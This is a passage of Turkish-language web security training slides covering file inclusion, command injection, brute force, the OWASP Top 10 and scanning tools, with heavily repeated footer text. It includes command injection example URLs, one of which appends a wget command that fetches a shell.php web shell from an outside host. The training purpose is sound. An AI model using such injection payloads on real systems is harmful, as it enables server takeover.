• Zafiyet ile birlikte saldırganlar web uygulamasının çalıştırıldığı uygulama yetkileri dahilinde sistemdeki
kritik dosyalara erişim sağlayabilir, buradaki verileri kullanarak sistemi tamamen ele geçirebilir.
158. www.prismacsi.com
© All Rights Reserved.
15
8
www.prismacsi.com
© All Rights Reserved.
15
8
www.prismacsi.com
© All Rights Reserved.
15
8
www.prismacsi.com
© All Rights Reserved.
15
8
File Inclusion Zafiyetinin Çözümü Nedir?
• Çağırılan tüm dosyalar için belirli kontroller (istenen dosya yetki seviyesine uyuyor mu? Dosya aynı
domainde mi? vb) yapılmalıdır.
• Çağırılan dosyalar, sayfalar direk kendi ismiyle birlikte çağırılmamalıdır.
159. www.prismacsi.com
© All Rights Reserved.
15
9
www.prismacsi.com
© All Rights Reserved.
15
9
www.prismacsi.com
© All Rights Reserved.
15
9
www.prismacsi.com
© All Rights Reserved.
15
9
File Inclusion
Uygulama
160. www.prismacsi.com
© All Rights Reserved.
16
0
www.prismacsi.com
© All Rights Reserved.
16
0
www.prismacsi.com
© All Rights Reserved.
16
0
www.prismacsi.com
© All Rights Reserved.
16
0
Command Injection Zafiyeti Nedir?
• Saldırgan kişilerin, sistem komutu çalıştırılan bölümleri manipüle ederek zararlı sisteme komut çalıştırma
işlemidir.
• index.php?dosya=flag.txt
• index.php?dosya=flag.txt;ls –la
• index.php?dosya=flag.txt;wget http://site.com/shell.php
161. www.prismacsi.com
© All Rights Reserved.
16
1
www.prismacsi.com
© All Rights Reserved.
16
1
www.prismacsi.com
© All Rights Reserved.
16
1
www.prismacsi.com
© All Rights Reserved.
16
1
Command Injection Zafiyetinin Sebebi Nedir?
• Uygulama üzerinde, sistem komutu çalıştırılan bölümlerde kullanıcıdan gelen verileri yeterli kontrol
gerçekleştirmeden çalıştırılması bu zafiyetin ana sebebidir.
162. www.prismacsi.com
© All Rights Reserved.
16
2
www.prismacsi.com
© All Rights Reserved.
16
2
www.prismacsi.com
© All Rights Reserved.
16
2
www.prismacsi.com
© All Rights Reserved.
16
2
Command Injection Zafiyetinin Zararları Nedir?
• Bu zafiyet ile sistem kodu çalıştırılabilindiği için sistemin büyük oranda ele geçirilme riski bulunmaktadır.
• Kritik seviye bir zafiyettir.
• Hacker bilgi ve yetenekleri ile doğru orantılı bir şekilde bu zafiyeti büyük bir koza dönüştürebilir.
163. www.prismacsi.com
© All Rights Reserved.
16
3
www.prismacsi.com
© All Rights Reserved.
16
3
www.prismacsi.com
© All Rights Reserved.
16
3
www.prismacsi.com
© All Rights Reserved.
16
3
Command Injection Zafiyetinin Çözümü Nedir?
• Sistem komutu kullanan yerlerde sistem komutu kullanmadan işlerin çözümü araştırılmalı ve mümkünse
sistem komutları çalıştırılmadan işlemler yapılmaya çalışılmalı.
• Sistem komutu çalıştırılması gereken durumlarda direk olarak sistem komutu kullanmak yerine
frameworklerin sağladığı özel fonksiyonlar kullanılmalıdır.
• Kullanıcıdan gelen veriler whitelist metoduna göre değerlendirilmeli ve ona göre işleme alınmalıdır.
164. www.prismacsi.com
© All Rights Reserved.
16
4
www.prismacsi.com
© All Rights Reserved.
16
4
www.prismacsi.com
© All Rights Reserved.
16
4
www.prismacsi.com
© All Rights Reserved.
16
4
Command Injection
Uygulama
165. www.prismacsi.com
© All Rights Reserved.
16
5
www.prismacsi.com
© All Rights Reserved.
16
5
www.prismacsi.com
© All Rights Reserved.
16
5
www.prismacsi.com
© All Rights Reserved.
16
5
Uygulama Sunucu Zafiyetleri
• Web uygulamalarında zafiyetler her zaman kodlardaki açıklıklardan gerçekleşmez. Bazen de uygulama
sunucusu üzerinde zafiyet bulunabilir.
• Apache - Uygulama
• Tomcat - Uygulama
• Nginx - Uygulama
• IIS - Uygulama
166. www.prismacsi.com
© All Rights Reserved.
16
6
www.prismacsi.com
© All Rights Reserved.
16
6
www.prismacsi.com
© All Rights Reserved.
16
6
www.prismacsi.com
© All Rights Reserved.
16
6
DoS Zafiyetleri
• Web uygulamaları üzerinde uygulama sunucusu ve yanlış kodlamaların sebep olduğu Servis Dışı Bırakma
zafiyetleri bulunabilir.
• MS15-034 IIS DoS Zafiyeti
• Mantıksal DoS - Kredi hesaplama örneği
• Uygulama
167. www.prismacsi.com
© All Rights Reserved.
16
7
www.prismacsi.com
© All Rights Reserved.
16
7
www.prismacsi.com
© All Rights Reserved.
16
7
www.prismacsi.com
© All Rights Reserved.
16
7
Oturum Yönetiminden Kaynaklanan Zafiyetler
• Web uygulaması içerisinde bilindik zafiyetlerin haricinde oturum yönetimi düzgün yapılmazsa bruteforce
saldırıları gibi çeşitli yöntemlerle kullanıcıların hesapları ele geçirilebilir.
• Basit Session Mekanizması – Bruteforce Uygulama
• Session Sabitleme – Uygulama
168. www.prismacsi.com
© All Rights Reserved.
16
8
www.prismacsi.com
© All Rights Reserved.
16
8
www.prismacsi.com
© All Rights Reserved.
16
8
www.prismacsi.com
© All Rights Reserved.
16
8
Brute Force Saldırıları
• Birçok web uygulaması kullanıcı giriş bölümü içermektedir. Gerekli önlemler alınmadığı taktirde çeşitli
uygulamalar kullanılarak buralara bruteforce saldırıları düzenlenebilir.
• Burpsuite Uygulama
169. www.prismacsi.com
© All Rights Reserved.
16
9
www.prismacsi.com
© All Rights Reserved.
16
9
www.prismacsi.com
© All Rights Reserved.
16
9
www.prismacsi.com
© All Rights Reserved.
16
9
OWASP TOP 10 2017
170. www.prismacsi.com
© All Rights Reserved.
17
0
www.prismacsi.com
© All Rights Reserved.
17
0
www.prismacsi.com
© All Rights Reserved.
17
0
www.prismacsi.com
© All Rights Reserved.
17
0
OWASP TOP 10
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring
171. www.prismacsi.com
© All Rights Reserved.
17
1
www.prismacsi.com
© All Rights Reserved.
17
1
www.prismacsi.com
© All Rights Reserved.
17
1
www.prismacsi.com
© All Rights Reserved.
17
1
OWASP TOP 10 - A1:Injection
• SQL, NoSQL, OS, LDAP injection gibi injection zafiyetleri zararlı içeriklerin uygulama üzerinde
direk olarak işlenmesi sonucu ortaya çıkar. Saldırgan kişiler bu zafiyeti kullanarak sistemde
yetkisiz bir şekilde işlemler gerçekleştirebilir.
172. www.prismacsi.com
© All Rights Reserved.
17
2
www.prismacsi.com
© All Rights Reserved.
17
2
www.prismacsi.com
© All Rights Reserved.
17
2
www.prismacsi.com
© All Rights Reserved.
17
2
OWASP TOP 10 - A2: Broken Authentication
• Uygulama fonksiyonlarındaki yetki kontrolü ve oturum yönetimi bölümlerinin eksik / hatalı
yapılması durumunda saldırgan kişilerin bu zafiyetlerden yararlanarak sisteme erişmesine
sebep olur.
173. www.prismacsi.com
© All Rights Reserved.
17
3
www.prismacsi.com
© All Rights Reserved.
17
3
www.prismacsi.com
© All Rights Reserved.
17
3
www.prismacsi.com
© All Rights Reserved.
17
3
OWASP TOP 10 - A3:Sensitive Data Exposure
• Çoğu web uygulaması ve API’lar finansal bilgiler, kişisel bilgiler gibi hassas bilgieri
koruyamazlar. Saldırganlar, kredi kartı sahtekarlığı, kimlik hırsızlığı gibi saldırılar için için zayıf
korumalı verileri çalabilir veya değiştirebilir. Hassas veriler saklanırken veya transfer
halindeyken ekstra güvenlik önlemleriyle güvenli hale getirilmelidir.
174. www.prismacsi.com
© All Rights Reserved.
17
4
www.prismacsi.com
© All Rights Reserved.
17
4
www.prismacsi.com
© All Rights Reserved.
17
4
www.prismacsi.com
© All Rights Reserved.
17
4
OWASP TOP 10 - A4:XML External Entities (XXE)
• Eski ve zayıf ayarlanmış XML işlemcileri, XML dokümanlarını external entity refence yöntemiyle
değerlendirir. External entities yerel dosyalara erişim sağlayarak hassas bilgilerin açığa
çıkmasına neden olabilir, uzaktan komut çalıştırabilir, port taraması yapabilir ve servis dışı
bırakmaya sebep olabilir.
175. www.prismacsi.com
© All Rights Reserved.
17
5
www.prismacsi.com
© All Rights Reserved.
17
5
www.prismacsi.com
© All Rights Reserved.
17
5
www.prismacsi.com
© All Rights Reserved.
17
5
OWASP TOP 10 - A5: Broken Access Control
• Sistemde oturum açmış kullanıcıların yetki seviyesi genellikle düzgün bir şekilde control edilmez.
Bunun sonucunda saldırgan kişiler başkalarına ait hassas dosyalara erişim sağlayabilir, bilgileri
değiştirip silebilir.
176. www.prismacsi.com
© All Rights Reserved.
17
6
www.prismacsi.com
© All Rights Reserved.
17
6
www.prismacsi.com
© All Rights Reserved.
17
6
www.prismacsi.com
© All Rights Reserved.
17
6
OWASP TOP 10 - A6: Security Misconfiguration
• Güvenlik ayarlarının doğru yapılandırılmamış olması en sık görülen zafiyetlerden biridir.
• Genellikle uygulamaların default ayarlarla kurulu bırakılması, kurulumların tamamlanmadan
bırakılması, HTTP headerları gibi bölümlerde bilgi açığa çıkması ya da hata sayfalarının bilgi
açığa çıkarması bu zafiyet kapsamına girer.
177. www.prismacsi.com
© All Rights Reserved.
17
7
www.prismacsi.com
© All Rights Reserved.
17
7
www.prismacsi.com
© All Rights Reserved.
17
7
www.prismacsi.com
© All Rights Reserved.
17
7
OWASP TOP 10 - A7: Cross-Site Scripting (XSS)
• XSS zafiyetleri, kullanıcıdan gelen güvensiz verilerin herhangi bir kontrolden geçmeden tekrar
tarayıcıya yansıtılması sonucu ortaya çıkar. Saldırgan kişiler böylece Javascript gibi tarayıcıda
yorumlanan teknolojileri kullanarak kullanıcılara zarar verebilirler.
178. www.prismacsi.com
© All Rights Reserved.
17
8
www.prismacsi.com
© All Rights Reserved.
17
8
www.prismacsi.com
© All Rights Reserved.
17
8
www.prismacsi.com
© All Rights Reserved.
17
8
OWASP TOP 10 - A8: Insecure Deserialization
• Güvensiz deserialization genellikle uzaktan kod çalıştırılmasına (RCE)’ye yol açar. Deserialization
zafiyetleri RCE ile sonuçlanmasa bile, injection saldırıları ve yetki yükseltme saldırıları
gerçekleştirmek için kullanılabilir.
179. www.prismacsi.com
© All Rights Reserved.
17
9
www.prismacsi.com
© All Rights Reserved.
17
9
www.prismacsi.com
© All Rights Reserved.
17
9
www.prismacsi.com
© All Rights Reserved.
17
9
OWASP TOP 10 - A9: Using Components with Known
Vulnerabilities
• Uygulama içerisinde çalışan eklentiler, kütüphaneler, frameworkler düzgün çalışması yetkili
kullanıcı haklarıyla çalıştırılması gerekebilir. Uygulama içerisinde çalışan bu bileşenlerde zafiyet
çıkması durumunda saldırganlar sisteme erişebilir ve very çalabilir.
180. www.prismacsi.com
© All Rights Reserved.
18
0
www.prismacsi.com
© All Rights Reserved.
18
0
www.prismacsi.com
© All Rights Reserved.
18
0
www.prismacsi.com
© All Rights Reserved.
18
0
OWASP TOP 10 - A10: Insufficient Logging & Monitoring
• İşlemleri loglamanın ve izlemenin yetersiz olduğu durumlarda sisteme sızan saldırganlar
sistemlerde uzun süre barınabilir. Sistemlerde uzun süre kalan saldırgan sistemi detaylı bir
şekilde inceleyebilir ve yatayda diğer sistemlere sıçrayabilir.
181. www.prismacsi.com
© All Rights Reserved.
18
1
www.prismacsi.com
© All Rights Reserved.
18
1
www.prismacsi.com
© All Rights Reserved.
18
1
www.prismacsi.com
© All Rights Reserved.
18
1
Otomatize Zafiyet Keşfi
182. www.prismacsi.com
© All Rights Reserved.
18
2
www.prismacsi.com
© All Rights Reserved.
18
2
www.prismacsi.com
© All Rights Reserved.
18
2
www.prismacsi.com
© All Rights Reserved.
18
2
Otomatize Zafiyet Keşfi - Netsparker
• Netsparker bilinen web uygulama zafiyetlerin çok büyük bir çoğunluğunu test ederek raporlayan
ve false pozitif oranı oldukça düşük milli gururumuz olan J mükemmel bir web uygulama
zafiyet tarayıcısıdır.
• Ücretlidir.
• Uygulama
183. www.prismacsi.com
© All Rights Reserved.
18
3
www.prismacsi.com
© All Rights Reserved.
18
3
www.prismacsi.com
© All Rights Reserved.
18
3
www.prismacsi.com
© All Rights Reserved.
18
3
Otomatize Zafiyet Keşfi - Acunetix
• Web uygulama zafiyet tarayıcısıdır.
• Ücretlidir.
• Uygulama
184. www.prismacsi.com
© All Rights Reserved.
18
4
www.prismacsi.com
© All Rights Reserved.
18
4
www.prismacsi.com
© All Rights Reserved.
18
4
www.prismacsi.com
© All Rights Reserved.
18
4
Otomatize Zafiyet Keşfi - Burpsuite
• Burpsuite çoğunlukla web proxy olarak kullanılan fakat Pro sürümüyle birlikte birçok zafiyeti
otomatize olarak tespit edebilen çok kullanışlı bir araçtır.
• Tarama işlemi yalnızca ücretli olan Pro sürümünde bulunmaktadır.
185. www.prismacsi.com
© All Rights Reserved.
18
5
www.prismacsi.com
© All Rights Reserved.
18
5
www.prismacsi.com
© All Rights Reserved.
18
5
www.prismacsi.com
© All Rights Reserved.
18
5
Otomatize Zafiyet Keşfi - Arachni
• Arachni open-source olarak geliştirilen, web arayüzü bulunan bir web uygulama güvenlik
tarayıcısıdır.
186. www.prismacsi.com
© All Rights Reserved.
18
6
www.prismacsi.com
© All Rights Reserved.
18
6
www.prismacsi.com
© All Rights Reserved.
18
6
www.prismacsi.com
© All Rights Reserved.
18
6
Otomatize Zafiyet Keşfi - Nessus
• Nessus web uygulama testlerinde genellikle web uygulama sunucusunun güvenliği test etmek
için kullanılan bir üründür.
• Ücretli sürümünün yanında Ücretsiz sürümleri bulunmaktadır.
• Uygulama
187. www.prismacsi.com
© All Rights Reserved.
18
7
www.prismacsi.com
© All Rights Reserved.
18
7
www.prismacsi.com
© All Rights Reserved.
18
7
www.prismacsi.com
© All Rights Reserved.
18
7
Otomatize Zafiyet Keşfi - Nikto
• Komut satırı üzerinden çalışan oldukça kullanışlı bir web uygulama güvenlik tarayıcısıdır.
• Uygulama
188. www.prismacsi.com
© All Rights Reserved.
18
8
www.prismacsi.com
© All Rights Reserved.
18
8
www.prismacsi.com
© All Rights Reserved.
18
8
www.prismacsi.com
© All Rights Reserved.
18
8
Sık Kullanılan Diğer Araçlar
189. www.prismacsi.com
© All Rights Reserved.
18
9
www.prismacsi.com
© All Rights Reserved.
18
9
www.prismacsi.com
© All Rights Reserved.
18
9
www.prismacsi.com
© All Rights Reserved.
18
9
Araçlar - wfuzz
• URL Fuzzing için kullanılır.
• Komut satırında çalışır.
• wfuzz -z list,robots.txt https://www.prismacsi.com/FUZZ
• Uygulama
190. www.prismacsi.com
© All Rights Reserved.
19
0
www.prismacsi.com
© All Rights Reserved.
19
0
www.prismacsi.com
© All Rights Reserved.
19
0
www.prismacsi.com
© All Rights Reserved.
19
0
Araçlar - dirbuster
• URL Fuzzing için kullanılır.
• Be Recursive kapatılması önerilir.
• Uygulama
191. www.prismacsi.com
© All Rights Reserved.
19
1
www.prismacsi.com
© All Rights Reserved.
19
1
www.prismacsi.com
© All Rights Reserved.
19
1
www.prismacsi.com
© All Rights Reserved.
19
1
Araçlar - sslscan
• SSL sertifikasının güvenliğini test etmek için
kullanılır.
• Uygulama
192. www.prismacsi.com
© All Rights Reserved.
19
2
www.prismacsi.com
© All Rights Reserved.
19
2
www.prismacsi.com
© All Rights Reserved.
19
2
www.prismacsi.com
© All Rights Reserved.
19
2
Araçlar - wpscan
• Wordpress’e özel geliştirilmiş bir zafiyet tarama
aracıdır.
• Login bruteforce işlemi gerçekleştirebilir.
• Uygulama
193. www.prismacsi.com
© All Rights Reserved.
19
3
www.prismacsi.com
© All Rights Reserved.
19
3
www.prismacsi.com
© All Rights Reserved.
19
3
www.prismacsi.com
© All Rights Reserved.
19
3
Araçlar - whatweb
• Site hakkında genel bilgilerin analiz edildiği bir
uygulamadır.
• Komut satırından çalışır.
• Uygulama
194. www.prismacsi.com
© All Rights Reserved.
19
4
www.prismacsi.com
© All Rights Reserved.
19
4
www.prismacsi.com
© All Rights Reserved.
19
4
www.prismacsi.com
© All Rights Reserved.
19
4
Kullanışlı Firefox Eklentileri
• Foxy Proxy: Hızlı bir şekilde proxy ayarı yapabilmemizi sağlar.
• HackBar: İçerisinde URL en birçok faydalı fonksiyonu bulunan bir eklentidir.
• Multi Open: Aynı anda verilen URL listesini sekmelerde sırayla otomatik olarak açar.
• ShowIP: Sitenin IP adresini görüntüler.
• User Agent Switcher: User Agent değiştirmek için kullanılır.
• Wappalyzer: Site içerisinde kullanılan teknolojiler hakkında bilgi verir.
• Cookie Manager+: Hızlıca Cookie değiştirmek için kullanılır.
• Tamper Data: Sunucuya giden veriyi değiştirip göndermemizi sağlar.
195. www.prismacsi.com
© All Rights Reserved.
19
5
www.prismacsi.com
© All Rights Reserved.
19
5
www.prismacsi.com
© All Rights Reserved.
19
5
www.prismacsi.com
© All Rights Reserved.
19
5
Uygulamalar
196. www.prismacsi.com
© All Rights Reserved.
19
6
www.prismacsi.com
© All Rights Reserved.
19
6
www.prismacsi.com
© All Rights Reserved.
19
6
www.prismacsi.com
© All Rights Reserved.
19
6
Sorular?
197. www.prismacsi.com
© All Rights Reserved.
19
7
www.prismacsi.com
© All Rights Reserved.
19
7
www.prismacsi.com
© All Rights Reserved.
19
7
www.prismacsi.com
© All Rights Reserved.
19
7
www.prismacsi.com
info@prismacsi.com
0 850 303 85 35
/prismacsi
İletişim